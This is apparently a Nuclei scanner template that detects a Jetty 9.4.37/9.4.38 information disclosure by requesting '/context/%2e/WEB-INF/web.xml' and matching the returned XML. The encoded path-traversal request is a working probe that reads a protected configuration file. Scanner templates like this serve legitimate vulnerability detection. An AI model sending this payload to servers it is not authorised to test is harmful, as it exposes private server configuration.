id: jetty-information-disclosure
info:
  name: Jetty 9.4.37 & 9.4.38 Information Disclosure
  author: geeknik
  reference: http://www.securityspace.com/smysecure/catid.html?id=1.3.6.1.4.1.25623.1.0.117479
  severity: low
  tags: jetty
requests:
  - method: GET
    path:
      - "{{BaseURL}}/context/%2e/WEB-INF/web.xml"
    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "application/xml"
      - type: status
        status:
          - 200
      - type: word
        words:
          - "<web-app>"
          - "java.sun.com"
        condition: and
